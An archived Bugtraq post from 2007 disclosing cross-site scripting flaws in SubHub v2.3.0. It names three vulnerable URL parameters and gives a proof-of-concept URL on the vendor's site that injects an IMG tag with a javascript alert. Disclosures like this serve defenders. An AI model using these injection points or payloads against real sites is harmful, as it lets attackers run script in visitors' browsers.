| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070321230250.16563.qmail@securityfocus.com>
Date: 21 Mar 2007 23:02:50 -0000
From: anon@...n.com
To: bugtraq@...urityfocus.com
Subject: **SubHub v2.3.0**
**SubHub v2.3.0**
Site: http://www.subhub.com/
& others that use this software
Type of Expliot: XSS
Version : 2.3.0
Discover: }T{-_-}T{
Bug in : /search?searchtext=<insert xss here>
/calendar/?message=<insert xss here>
/subscribe?message=<insert xss here>
- - - - - - - - - - - - - - - -
Exploit POC
http://www.subhub.com/search?searchtext= <IMG SRC=javascript:alert('XSS')>
- - - - - - - - - - - - - - - -
Greetz to : -ZV-